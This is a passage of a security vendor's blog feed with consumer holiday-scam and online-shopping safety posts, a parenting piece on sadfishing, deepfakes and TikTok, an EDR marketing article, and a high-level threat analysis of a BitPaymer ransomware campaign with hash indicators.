On the latest episode, he joins McAfee’s Advanced Threat Research team to learn if what looks like a foolproof way to secure your packages may, in fact, turn out to be anything but. Is a smart lockbox enough to deter digital porch piracy? Or is this episode’s white-hat hacker able to pick the lock without breaking a sweat?

The post Are Smart Padlocks Secure Enough to Protect Your Packages? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/hackable/are-smart-padlocks-secure-enough-to-protect-your-packages/feed/ 0
This Holiday Season, Watch Out for These Cyber-Grinch Tricks https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-season-tricks-survey-us/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-season-tricks-survey-us/#respond Tue, 19 Nov 2019 05:01:38 +0000 /blogs/?p=97496

Whether it be that their shoes are too tight, their heads aren’t screwed on just right, or they’re expressing a little bit of “Bah Humbug,” cyber-grinches and cyber-scrooges everywhere view the holiday season as a perfect opportunity to exploit users. In fact, McAfee recently conducted a survey of over 1,000 adults over the age of […]

The post This Holiday Season, Watch Out for These Cyber-Grinch Tricks appeared first on McAfee Blogs.

]]>

Whether it be that their shoes are too tight, their heads aren’t screwed on just right, or they’re expressing a little bit of “Bah Humbug,” cyber-grinches and cyber-scrooges everywhere view the holiday season as a perfect opportunity to exploit users. In fact, McAfee recently conducted a survey of over 1,000 adults over the age of 18 in the U.S. from October 10-20, 2019 to shed light on the types of scams they encountered this year. Let’s take a look at how criminals are attempting to steal the fun of the holiday season with various scams.

Ribbons, Wrappings, and Robocalls

The survey revealed that 48% of Americans have been a victim of or know someone who has been a victim of robocalling in 2019, making it the most prevalent scam of the year. Respondents also reported that they had been targeted with email phishing (41%) and text phishing (35%) in 2019. Another popular trend this year among these crooks? What’s old is new again. While cybercriminal activity has become increasingly sophisticated over the years, survey results showed that these less sophisticated scams of Christmas are still a popular avenue for cybercriminals to exploit.

Combined, all these scams have left quite a financial impact. 74% of respondents admitted to losing more than $100 to these scams, while 30% lost more than $500. What’s more, over 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone, posing an even greater threat to users’ data.

Between all the threats stemming from these cyber-grinches and cyber-scrooges, scams have the potential to haunt users’ digital past, present, and future. Which begs the question – what should users do? They can start by first reading McAfee’s own Christmas Carol:

Be on the Lookout for These Cyber-Grinch Tricks

While most users believe that cyber-scams become more prevalent during the holidays, a third don’t actually take any steps to change their online behavior. In fact, by cutting some corners to pave way for holiday fun, users may be putting themselves at more risk than they realize. While using devices and apps for tasks like holiday shopping, streaming TV shows, and food delivery services, users are sharing more personal information than ever before. By targeting these popular apps, cybercriminals can collect and store key data, including home addresses, credit card information, and account passwords that they can use for future attacks.

Another trend that’s set to hit unsavvy users this holiday season is phony gift cards, with McAfee’s Advanced Threat Research team discovering phony gift cards sold on the cybercriminal underground. However, the survey found that only 43% of respondents are aware of fake gift cards as a threat. What’s more, users are also failing to check shopping websites, with over one-third (37%) of respondents admitting that they don’t check an email sender or retailer’s website for authenticity. By not being mindful of these grinchy tricks, users open themselves up to many avenues of exploitation.

Securing Your Holiday Season

We must stop these Christmas scams from coming, but how? To help ensure a cyber-grinch doesn’t put a damper on your holiday season, check out the following security tips.

  • Never reuse passwords. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. Ensure that all of your passwords are complex and unique.
  • Go directly to the source. Instead of clicking on a link in an email, it’s always best to check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use a comprehensive security solution, likeMcAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.
  • Use a tool to help protect your personal information. A solution like McAfee Identity Theft Protection takes a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help keep identities personal and secure.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post This Holiday Season, Watch Out for These Cyber-Grinch Tricks appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-season-tricks-survey-us/feed/ 0
‘Tis the Season for Cybersecurity: Stay Protected This Holiday Season https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-scam-cybersecurity-survey/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-scam-cybersecurity-survey/#respond Tue, 19 Nov 2019 05:01:05 +0000 https://securingtomorrow.mcafee.com/?p=97393

It’s beginning to look a lot like the holiday season – and with the holidays comes various opportunities for cyber-scrooges to exploit. While users prepare for the festivities, cybercriminals look for opportunities to scam holiday shoppers with various tricks. To shed more light on how these crooks are putting a damper on user’s holiday season, […]

The post ‘Tis the Season for Cybersecurity: Stay Protected This Holiday Season appeared first on McAfee Blogs.

]]>

It’s beginning to look a lot like the holiday season – and with the holidays comes various opportunities for cyber-scrooges to exploit. While users prepare for the festivities, cybercriminals look for opportunities to scam holiday shoppers with various tricks. To shed more light on how these crooks are putting a damper on user’s holiday season, McAfee surveyed over 8,000 adults over the age of 18 across multiple countries from October 10-20, 2019 on the types of scams they’ve encountered this year.

The Scams of Christmas Past

Cyber-scrooges have upped the ante over the years, using more sophisticated measures to adapt to consumers’ evolving digital lifestyles. However, scams of Christmas Past are still haunting users today, as global findings indicate that email and text phishing are still prevalent. For example, the percentage of respondents stating that they still experience email phishing ranges from 25% in India to a whopping 42% in France. Respondents stating that they still experience text phishing ranged from 21% in India to 35% in Australia.

Additionally, robocalling has seen an increase in popularity in 2019. Fifty-one percent of respondents in France stated that they still receive robocalls. The survey found that 48% of respondents in the U.S. and 32% of Australians receive robocalls, as well as 34% in Spain, and 33% in Germany claimed that they have fallen victim to robocalls.

The Scams of Christmas Present

During the holidays, cyber-scrooges are likely to further exploit scams of Christmas Present to take advantage of users’ generosity. For example, several survey respondents in the U.K., France, Germany, Spain, Australia, India, and Singapore stated that they had fallen victim to fake charity scams in 2019. Knowing that many people enjoy making donations during this time of year, cybercriminals will likely pose as a charity online as a ploy to collect financial data and money from unsuspecting users.

Since many people do a lot of their holiday shopping online, users should also beware of shipping notification scams, as respondents in the U.K., Spain, Australia, India, and Singapore have fallen victim to these scams throughout this year. This scam, along with all those of Christmas Past and Present, proves that as people continue to adopt technology into their everyday lives, they are in turn giving cybercriminals more opportunities to exploit during the holiday season.

The Scams of Christmas Future

Whether it be email phishing or fake charity scams, users must stay updated on common cyber-scrooge practices to help protect their personal and financial data. As more data and user credentials are gathered from breaches, cybercriminals are looking to take their business to the next level and leverage more advanced techniques. For example, the cybercriminal underground poses a threat to users with more than 2.2 billion stolen account credentials made available for purchase in Q1 2019. These crooks will likely continue to sell and share user data across the Dark Web for the possibility of more profit.

Cybercriminals will also leverage data collected from breaches to better understand which users to target and how they can easily target them with social engineering and AI (artificial intelligence). Most users will probably ignore a call from an unknown number, but what about a call from a family member? Cybercriminals will create more sophisticated scams by including a family member’s caller ID in the hopes of exploiting users through more personal engagement.

Attacks will not only likely grow in sophistication but in volume in the future as well. From interactive speakers to IP cameras to other internet-connected devices like thermostats and appliances — IoT devices have greatly increased the attack surface. As we see an increase in the volume of devices going into homes with a lack of security controls built-in, cybercriminals will likely focus on exploiting consumers through these gadgets. The good news? As we look ahead towards the scams of Christmas Future, we can also work to better prepare our networks and devices before we fall into cybercriminals’ traps.

Even though users believe that cyber-scams become more prevalent during the holiday season, a third don’t actually take steps to change their online behavior. To help ensure your holiday season goes off without a hitch, follow these tips to help stay secure:

  • Say so long to robocalls. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected. Let all other unknown calls go to voicemail and never share personal details over the phone.
  • Go directly to the source. Be skeptical of emails or texts claiming to be from companies or charities with peculiar asks or messages. Instead of clicking on a link within the email or text message, it’s best to go straight to the company’s website or contact customer service.
  • Hover over links to verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection can help your holiday shopping spree go smoothly by providing safe web browsing, virus protection, and more.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post ‘Tis the Season for Cybersecurity: Stay Protected This Holiday Season appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/holiday-scam-cybersecurity-survey/feed/ 0
Threat Hunting or Efficiency: Pick Your EDR Path? https://www.mcafee.com/blogs/enterprise/endpoint-security/threat-hunting-or-efficiency-pick-your-edr-path/ https://www.mcafee.com/blogs/enterprise/endpoint-security/threat-hunting-or-efficiency-pick-your-edr-path/#comments Tue, 12 Nov 2019 15:00:53 +0000 https://securingtomorrow.mcafee.com/?p=97369

“Do You Want It Done Fast, Or Do You Want It Done Right?” “Yes.” “Help out more with our business objectives.” “Cover an increasing number of endpoints.” “Cut budgets.” “Make it all work without adding staff.” Cybersecurity teams face a lot of conflicting objectives—both within their teams and from upper management. But a May 2019 […]

The post Threat Hunting or Efficiency: Pick Your EDR Path? appeared first on McAfee Blogs.

]]>

“Do You Want It Done Fast, Or Do You Want It Done Right?” “Yes.”

“Help out more with our business objectives.” “Cover an increasing number of endpoints.” “Cut budgets.” “Make it all work without adding staff.”

Cybersecurity teams face a lot of conflicting objectives—both within their teams and from upper management. But a May 2019 commissioned study conducted by Forrester Consulting on behalf of McAfee really puts a fine point on it: When decision makers were asked which endpoint security goals and initiatives they’re prioritizing for the coming year, the top two responses were “improve security detection capabilities” (87%) and “increase efficiency in the SOC” (76%).

Unfortunately, traditional EDR solutions have made accomplishing both of these goals (and in some cases, even one or the other!) difficult, if not impossible. According to the study, gaps in EDR capabilities have created pain points for 83% of enterprises. For instance, while 40% of enterprises consider threat hunting a critical requirement, only 29% feel their current EDR solutions fully meet that need. On an even more basic level, 36% worry their EDR solution doesn’t surface every threat that breaks through—while an equal number of respondents say the alerts that are surfaced by their EDR are frequently not relevant or worth investigating.

These numbers clearly show there’s a lot of room for improvement, but at the same time, these two goals seem to be less than complementary. How would you choose to try and meet them?

Scenario 1: The Status Quo

Your team continues utilizing their traditional EDR solution on its own.

You lose points in efficiency out of the gate—according to Forrester, 31% of companies say that the systems are so complex, their junior staff lack the skillset to triage and investigate alerts without senior staff.

The number of alerts output by traditional EDR solutions will cost you efficiency in another way: another 31% of respondents say their teams struggle to keep up with the volume of alerts generated by their EDRs.

On the threat detection side, you’re not starting out with a perfect score, either: Again, keep in mind that more than a third of respondents believe that, even with this large volume of alerts, not everything is being caught.

As a baseline, let’s assume you’re starting out with a 7 in Threat Detection, and a 3.5 in Efficiency.
You’re still a long way from meeting your goals. Let’s look at our options.

Do you want to:

  • Add more staff members
  • Bolt on more software
  • Hire an MDR

Scenario 2: Add more staff members

With efficiency seeming such a far-off goal, your team decides to focus its efforts on threat detection. To help manage the number of alerts, you hire two new employees. You still have every bit as much noise coming from your EDR, and it still isn’t catching everything, but your team has marginally more ability to triage and respond to threats. You gain a point for threat detection, but a look at your department budget sheet shows your efficiency score is basically shot.

Final Score: 8 in Threat Detection, and a 2 in Efficiency.

Scenario 3: Bolting On More Software

Other businesses are taking a different tack. They’re keeping their traditional EDR solution, but they’re also bolting on more point solutions to help catch things that fall through the cracks. If you choose to go this route, your threat detection capabilities go up …. but between all the duplicate alerts, separate interfaces, and near complete lack of integration, your team is critically bogged down.  With junior staff able to triage just 31 percent of alerts on traditional EDR systems, senior analysts are having to manage all the alerts on all the interfaces on their own.

All this software isn’t cheap, and you’re losing time in both training in all of it, and in switching back and forth. Meanwhile, the solutions that were supposed to improve your threat detection capabilities are doing so … somewhat … but with things falling through the cracks amidst the chaos and analyst fatigue setting in, you wouldn’t know it.

Final Score: 7.5 in Threat Detection, 1.5 in Efficiency.

Scenario 4: Partnering with an MDR

You don’t want to hire any more staff—and even if you did, there aren’t many to hire. So instead you hire a Managed Detection and Response (MDR) provider to do what your EDR should be doing, but isn’t. You partner with the most reputable MDR you can find, and you’re confident that between what you’re doing and what they’re doing, there isn’t much getting past you. But you’re also paying twice to get a single set of capabilities.

Final Score: 9 in Threat Detection, 1 in Efficiency

Clearly, it’s time to try something new

  • I want to improve my efficiency with my current EDR!
  • I want to try something better.

Scenario 5: Improving efficiency with current EDR

How do you make a first-gen EDR more efficient? You don’t. In other words, if you want to get more out of an EDR that doesn’t utilize the latest technologies, the only adjustments you can make here have to come from your team. If you could get more threat detection mileage out of the same number of team members, your efficiency level would naturally rise.

Initial Score: 8 in Threat Detection, 4 in Efficiency

But as you soon find out, the mandatory late nights and your “you’d better step it up or else!” attitude aren’t exactly doing wonders for morale. With cybersecurity professionals in high demand everywhere, it isn’t long before you’re down at least one team member. Now you have 4 team members doing the number of 5. Which sounds decent ….

Intermediate Score: 6 in Threat Detection, 6 in Efficiency

… until an enterprising hacker takes note of your shorthandedness and targets you, hoping to use your situation to their advantage. Unfortunately, not only do you have a highly imperfect traditional EDR system and four employees trying to do the work of five … you have four disgruntled employees trying to do the work of five. According to IDC, in organizations that have experienced a breach in the last 12 months, those staff who are extremely satisfied are, on average, more likely to report fewer hours to identify the breach (11 hours) than those who are dissatisfied (23 hours). Guess which camp your team falls into?

Before long, your company is brought to its knees by a major attack. The press is all over it, and confidence in your company plummets. Your company’s reputation might recover … eventually … but things aren’t looking so good for you.

Final Score: Game Over.

Scenario 6: I want to try something better.

You’ve heard from your friends and colleagues about what doesn’t work. And, of course, you’ve read the horror stories. But you’re still left with two disparate goals. What if there was a way to increase threat detection capabilities without hiring more personnel, outsourcing what your EDR should be able to handle but isn’t, or creating a system with more bolts than Frankenstein’s monster?

According to Forrester, there is a way to bridge the goals of greater efficiency and better threat detection. With AI guided investigation, your junior analysts will be able to triage threats like your more seasoned analysts, freeing your senior analysts to focus on mission-critical tasks. And with less noise, your team will be free to focus on more of the right alerts.

Survey respondents backed this up: 35 percent believe AI-guided investigations will lead to fewer breaches, and 52 percent think they’ll lead to improved efficiency. Mission accomplished.

Final Score: You=1, Hackers=0.

To read more about how AI-guided investigation can help revolutionize your SOC, click here.

The post Threat Hunting or Efficiency: Pick Your EDR Path? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/threat-hunting-or-efficiency-pick-your-edr-path/feed/ 1
Secure Your Black Friday & Cyber Monday Purchases https://www.mcafee.com/blogs/consumer/black-friday-cyber-monday-safe-online-shopping/ https://www.mcafee.com/blogs/consumer/black-friday-cyber-monday-safe-online-shopping/#respond Mon, 11 Nov 2019 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=97282

As we gear up to feast with family and friends this Thanksgiving, we also get our wallets ready for Black Friday and Cyber Monday. Black Friday and Cyber Monday have practically become holidays themselves, as each year they immediately shift our attention from turkey and pumpkin pie to holiday shopping. Let’s take a look at […]

The post Secure Your Black Friday & Cyber Monday Purchases appeared first on McAfee Blogs.

]]>

As we gear up to feast with family and friends this Thanksgiving, we also get our wallets ready for Black Friday and Cyber Monday. Black Friday and Cyber Monday have practically become holidays themselves, as each year they immediately shift our attention from turkey and pumpkin pie to holiday shopping. Let’s take a look at these two holidays, and how their popularity can impact users’ online security.

The Origins of the Holiday Shopping Phenomenon

You might be surprised to find out that the term “Black Friday” was first associated with a financial crisis, not sales shopping. According to The Telegraph, the U.S. gold market crashed on Friday, September 24, 1869, leaving Wall Street bankrupt. It wasn’t until the 1950s that Black Friday was used in association with holiday shopping when large crowds of tourists and shoppers flocked to Philadelphia for a big football game. Because of all the chaos, traffic jams, and shoplifting opportunities that arose, police officers were unable to take the day off, coining it Black Friday. It wasn’t until over 50 years later that Cyber Monday came to fruition when Shop.org coined the term as a way for online retailers to participate in the Black Friday shopping frenzy.

Growth Over the Years

Since the origination of these two massive shopping holidays, both have seen incredible growth. Global interest in Black Friday has risen year-over-year, with 117% average growth across the last five years. According to Forbes, last year’s Black Friday brought in $6.2 billion in online sales alone, while Cyber Monday brought in a record $7.9 billion.

While foot traffic seemed to decrease at brick-and-mortar stores during Cyber Week 2018, more shoppers turned their attention to the internet to participate in holiday bargain hunting. Throughout this week, sales derived from desktop devices came in at 47%, while mobile purchases made up 45% of revenue and tablet purchases made up 8% of revenue.

 

So, what does this mean for Black Friday and Cyber Monday shopping this holiday season? Adobe Analytics projects that Thanksgiving and Black Friday will bring in $12.3 billion in online sales and Cyber Monday will bring in $9.48 billion. If one thing’s for sure, this year’s Black Friday and Cyber Monday sales are shaping up to be the biggest ones yet for shoppers looking to snag some seasonal bargains. However, the uptick in online shopping activity provides cybercriminals with the perfect opportunity to wreak havoc on users’ holiday fun.

Holiday Bargain or Shopping Scam?

Inherently, Black Friday and Cyber Monday are pretty similar, with the main difference being where users choose to shop. While Black Friday sees a mix of online and in-store shoppers, most consumers will participate in Cyber Monday sales from their mobile phones or desktops at work. Plus, with mobile Cyber Week sales increasing year over year, it’s clear that users are gravitating towards the convenience of shopping on the go. However, the increase in mobile online shopping also creates an opportunity for cybercriminals to exploit. The latest McAfee Mobile Threat Report revealed a huge increase in device backdoors, fake apps, and banking trojans. With more and more users turning to their smartphones this holiday shopping season, they are in turn potentially subject to a wide variety of mobile cyberattacks.

Another threat to users’ holiday shopping sprees? Rushed purchases. Thanks to a later Thanksgiving, Cyber Monday falls on December 2nd, leaving users with one less shopping week between Turkey Day and Christmas. Because of this time crunch, many users are feeling pressured to get their holiday shopping done in time and might forego some basic cybersecurity practices to speed up the online shopping process. This includes not checking online retailer authenticity, falling for fake Black Friday deals, and hastily giving up more personal information than necessary, all in the interest of jumping on a sale before it’s too late.

How to Stay Secure This Holiday Season

In the blur of the holiday shopping frenzy, how can you help protect your personal information online? Before whipping out your credit card this Black Friday and Cyber Monday, check out these cybersecurity tips to ensure your holiday shopping spree goes off without a hitch:

  • Look for the lock icon. Secure websites will start with “https,” not just “http.” Double-check that you see the padlock icon right next to the web address in your browser. If you don’t, it’s best to avoid making purchases on that website.
  • If you can help it, shop on your desktop. Although shopping on a smartphone allows you to make purchases on the go, this opens you up to threats like mobile malware and fake shopping apps. Additionally, URLs are often shortened on mobile devices, making it easier for scammers to trick you with clone websites.
  • Ask the critics. Cybercriminals will often create fake websites to try and exploit users looking to get in on the Black Friday and Cyber Monday action. If you’re unsure about a product or retailer, read lots of reviews from trusted websites to help see if it’s legitimate.
  • Be on the lookout for suspicious websites. Misspellings and grammatical errors are often a sign that it’s a rip off of a legitimate site. If the site’s content looks a little rough around the edges, this is probably a sign that it was created by a cybercriminal.
  • Don’t be too optimistic. Beware of bogus Black Friday and Cyber Monday deals with fake “free” offers. If you spot an ad online that seems too good to be true, chances are it probably is.
  • Use a comprehensive security solution. Using a solution like McAfee LiveSafe can help your holiday shopping spree go smoothly by providing safe web browsing, virus protection, and more. Check out our own special Cyber Week Offer here.

Looking for more security tips and trends? Be sure to follow @McAfee Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Secure Your Black Friday & Cyber Monday Purchases appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/black-friday-cyber-monday-safe-online-shopping/feed/ 0
Sadfishing, Deepfakes & TikTok: Headlines You May Have Missed https://www.mcafee.com/blogs/consumer/family-safety/sadfishing-deepfakes-tiktok-headlines-you-may-have-missed/ https://www.mcafee.com/blogs/consumer/family-safety/sadfishing-deepfakes-tiktok-headlines-you-may-have-missed/#respond Sat, 09 Nov 2019 15:00:32 +0000 https://securingtomorrow.mcafee.com/?p=97330

Technology trends move fast and the digital newsfeeds run non-stop. No worries, we’ve got your backs, parents. Here are three important headlines you may have missed about some of the ways kids are using their devices and how you can coach them around the risks. What’s Sadfishing and is Your Child Doing it Online? Sadfishing […]

The post Sadfishing, Deepfakes & TikTok: Headlines You May Have Missed appeared first on McAfee Blogs.

]]>

Technology trends move fast and the digital newsfeeds run non-stop. No worries, we’ve got your backs, parents. Here are three important headlines you may have missed about some of the ways kids are using their devices and how you can coach them around the risks.

What’s Sadfishing and is Your Child Doing it Online?

Sadfishing is the act of someone making exaggerated claims about their emotional problems to generate sympathy from other people online. The concept of sadfishing surfaced when some alleged that celebrity influencers Justin Bieber and Kendall Jenner were engaging fans a form of sadfishing, which then sparked others to follow suit. The practice is growing to the extent that a  recent Digital Awareness UK report, based on interviews with 50,000 schoolchildren, says sadfishing could be damaging teenagers’ self-esteem and leading to bullying.

The risks: Young people who post emotionally-heavy content could be bullied by peers who see a vulnerable post as an empty bid for attention. But here’s where things get murky. Is a person sadfishing for attention or could that person truly be in crisis? Unless you are a professional, there’s no definite way to know since online interactions tend to lack context. For that reason, professionals say that alarming posts should be taken seriously, and everyone should become familiar with how to help someone in an emotional crisis online.

Talking points: Browsing posts and comments on your child’s social feeds is one way to see if your child is sadfishing. Coach your kids on how to express themselves online and to carefully consider the deeper intent of a confessional post before sharing. Encourage your child to consider these questions themselves posting:

  • What am I hoping to achieve with this post?
  • Could I more effectively work out this issue more if I confided it to a friend or family member face-to-face?
  • Should I journal my feelings privately before sharing them online?

Deepfakes: What Your Family Needs to Know

A deepfake is a video created using artificial intelligence to show real people doing and saying things they never did. Deepfakes can be humorous (like the political deep fakes circulating) or harmful. Deepfakes are on the rise because free apps such as FakeApp and DeepFaceLab allow any amateur to manipulate videos.

The risks: It’s getting tougher to discern real from fake videos, which means that misinformation spreads quickly as does the fallout. Deepfakes can destroy a person’s reputation, spread fake pornography videos, alter election outcomes, or even impact the stock market. Stay tuned for updates, the topic of AI and deepfakes is getting more complex and risky every day.

Talking points: Digital literacy is now a pillar of modern parenting. Teaching kids how to evaluate online information is critical, especially with the rapid growth of AI. Discuss deepfake technology with your kids. Use this Deep Fake overview video to help them understand how the technology works. Explore the topic of personal responsibility online and the ethics of creating misleading content. To spot deepfakes look for things in a video such as lack of eye blinking, shadows or borders that seem wrong, mismatch skin tones, and lip movement that is slightly out of sync with the person’s words.

TikTok App Obsession (and Safety Concerns) on the Rise

TikTok, the looping short-form video app owned by Chinese company ByteDance, that’s also wildly popular with teens, is back in the news for several reasons. Recently U.S. Senators asked the Intelligence Committee to look into whether the Chinese-owned app poses a security risk to the United States. Also, a BBC investigation found that TikTok failed to remove cyber predators from the app who were sending sexually explicit messages to children. And, lastly, reports in the Wall Street Journal claim that Islamic State militants have been posting short propaganda videos to TikTok as part of a recruitment effort.

Risks: In addition to online predators, TikTok app users can share inappropriate content such as talk about sex, alcohol, drugs, and girls wearing suggestive clothing. Too, there’s the risk of posting regrettable content, data mining (an issue in the past for TikTok), and, as with any app, there’s the very real (and reported) issue of cyberbullying.

Talking points: Anyone over the age of 13 can open a TikTok account, but it’s widely known that elementary-aged kids have accounts. If your child wants a TikTok account, consider downloading the app and looking around. After you’ve explored, discuss why age controls are in place, and consider putting comprehensive parental controls on your family devices. Review the most current device and app safety practices. The National Society for the Prevention of Cruelty to Children (NSPCC) has a great online safety acronym to guide family discussions called TEAM:

  • Talk about staying safe online
  • Explore the online world together
  • Agree on rules about what’s OK and what’s not
  • Manage your family’s settings and controls.

Keeping up with the online trends your kids gravitate to is one of the most important things you can do to keep your family conversations relevant and keep your kids safe online. To stay updated on all of the latest family and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and get even more family safety insights on Facebook.

The post Sadfishing, Deepfakes & TikTok: Headlines You May Have Missed appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/sadfishing-deepfakes-tiktok-headlines-you-may-have-missed/feed/ 0
Spanish MSSP Targeted by BitPaymer Ransomware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/#respond Fri, 08 Nov 2019 12:00:53 +0000 https://securingtomorrow.mcafee.com/?p=97348

Initial Discovery This week the news hit that several companies in Spain were hit by a ransomware attack. Ransomware attacks themselves are not new but, by interacting with one of the cases in Spain, we want to highlight in this blog how well prepared and targeted an attack can be and how it appears to […]

The post Spanish MSSP Targeted by BitPaymer Ransomware appeared first on McAfee Blogs.

]]>

Initial Discovery

This week the news hit that several companies in Spain were hit by a ransomware attack. Ransomware attacks themselves are not new but, by interacting with one of the cases in Spain, we want to highlight in this blog how well prepared and targeted an attack can be and how it appears to be customized specifically against its victims.

In general, ransomware attacks are mass-spread attacks where adversaries try to infect many victims at the same time and cash out quickly. However, this has significantly changed over the past two years where more and more ransomware attacks are targeting high-value targets in all kinds of sectors.

Victims are infected with a different type of malware before the actual ransomware attack takes place. It looks like adversaries are using the infection base to select or purchase the most promising victims for further exploitation and ransomware, in a similar way to how the sale of Remote Desktop Access on underground forums or private Telegram channels is being used for victim selection for ransomware attacks.

In the following paragraphs, we will take you step by step through the modus operandi of the attack stages and most important techniques used and mapped against the MITRE ATT&CK Framework.

The overall techniques observed in the campaign and flow visualization:

Technical Analysis

The overall campaign is well known in the industry and the crew behind it came back to the scene reusing some of the TTPs observed one year ago and adding new ones like: privilege escalation, lateral movement and internal reconnaissance.

Patient 0 – T1189 Drive-by Compromise

The entry point for these types of campaigns starts with a URL that points the user to a fake website (in case the website is compromised) or a legitimate page (in case they decided to use a pay-per-install service) using social engineering techniques; the user gets tricked to download the desired application that will use frameworks like Empire or similar software to download and install next stage malware which, in this case, is Dridex.

First infection – T1090 Connection Proxy

These types of attacks are not limited to one type of malware; we have observed it being used by:

  • Azorult
  • Chthonic
  • Dridex

It is currently unclear why one would select one malware family above the other, but these tools allow for remote access into a victim’s network. This access can then be used by the actor as a launchpad to further exploit the victim’s network with additional malware, post-exploitation frameworks or the access can be sold online.

For quite some time now, Dridex’s behavior has changed from its original form. Less Dridex installs are linked to stealing banking info and more Dridex infections are becoming a precursor to a targeted ransomware attack.

This change or adaptation is something we have observed with other malware families as well.

For this campaign, the Dridex botnet used was 199:

Information Harvesting – T1003 Credential Dumping

From the infection, one or multiple machines are infected, and the next step is to collect as many credentials as they can to perform lateral movement. We observed the use of Mimikatz to collect (high privileged) credentials and re-use them internally to execute additional software in the Active Directory servers or other machines inside the network.

The use of Mimikatz is quite popular, having been observed in the modus operandi of more than 20 different threat actors.

Lateral Movement – T1086 PowerShell

The use of PowerShell helps attackers to automate certain things once they are in a network. In this case, we observed how Empire was used for different sock proxy PowerShell scripts to pivot inside the network:

Extracting information about the IP found in the investigation, we observed that the infrastructure for the Dridex C2 panels and this proxy sock was shared.

PowerShell was also used to find specific folders inside the infected systems:

A reason for an attacker to use a PowerShell based framework like Empire, is the use of different modules, like invoke-psexec or invoke-mimikatz, that can execute remote processes on other systems, or get credentials from any of the systems where it can run Mimikatz. When deployed right, these modules can significantly increase the speed of exploitation.

Once the attackers collected enough high privileged accounts and got complete control over the Active Directory, they would then distribute and execute ransomware on the complete network as the next step of their attack, in this case BitPaymer.

Ransomware Detonation – T1486 Data Encrypted for Impact

BitPaymer seemed to be the final objective of this attack. The actors behind BitPaymer invest time to know their victims and build a custom binary for each which includes the leet-speek name of the victim as the file extension for the encrypted files, i.e. “financials.<name_of_victim>”.

In the ransomware note, we observed the use of the company name too:

Observations

  • One of the remote proxy servers used in the operation shares the same infrastructure as one of the C2 panels used by Dridex.
  • We observed how a Dridex infection served as a launch point for an extensive compromise and BitPaymer ransomware infection.
  • Each binary of Bitpaymer is specially prepared for every single target, including the extension name and using the company name in the ransomware note.
  • Certain Dridex botnet IDs are seen in combination with targeted BitPaymer infections.
  • Companies must not ignore indicators of activity from malware like Dridex, Azorult or NetSupport; they could be a first indicator of other malicious activity to follow.
  • It is still unclear how the fake update link arrived at the users but in similar operations, SPAM campaigns were most likely used to deliver the first stage.

McAfee Coverage

Based on the indicators of compromise found, we successfully detect them with the following signatures:

  • RDN/Generic.hbg
  • Trojan-FRGC!7618CB3013C3
  • RDN/Generic.dx

The C2 IPs are tagged as a malicious in our GTI.

McAfee ATD Sandbox Detonation

Advanced Threat Detection (ATD) is a specialized appliance that identifies sophisticated and difficult to detect threats by executing suspicious malware in an isolated space, analyzing its behavior and assessing the impact it can have on an endpoint and on a network.

For this specific case, the ATD sandbox showcases the activity of Bitpaymer in a system:

We observe the use of icacls and takeown to change permissions inside the system and the living off the land techniques are commonly used by different type of malware.

ATD Sandbox extracted behavior signatures observing Bitpaymer detonation in the isolated environment:

Having the opportunity to detonate malware in this environment could give indicators about the threat types and their capabilities.

McAfee Real Protect

Analysis into the samples garnered from this campaign would have been detected by Real Protect. Real Protect is designed to detect zero-day malware in near real time by classifying it based on behavior and static analysis. Real Protect uses machine learning to automate classification and is a signature-less, small client footprint while supporting both offline mode and online mode of classification. Real Protect improves detection by up to 30% on top of .DAT and McAfee Global Threat Intelligence detections, while producing actionable threat intelligence.

YARA RULE

We have a YARA rule available on our ATR GitHub repository to detect some of the versions of BitPaymer ransomware.

IOCs

  • 3ab42ca8ce81f9df0c4f7cd807528c5dd0fb5108
  • 4862fbb188285586218cd96e69a2e4436827d2fe
  • c1ad6c3ab06fc527c048cd15c6fc701b5a74a900
  • 1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05
  • 628c181e6b9797d8356e43066ae182a45e6c37dbee28d9093df8f0825c342d4c
  • bd327754f879ff15b48fc86c741c4f546b9bbae5c1a5ac4c095df05df696ec4f
  • 0f630aaf8b5c4e958445ec0c2d5ec47e
  • 9b982fa4b42813279426449ddd6a1dbe
  • c46ad4159c90bc11d6d94a28458553d7

A special thanks to John Fokker and Christiaan Beek for their assistance with this blog.

The post Spanish MSSP Targeted by BitPaymer Ransomware appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/feed/ 0
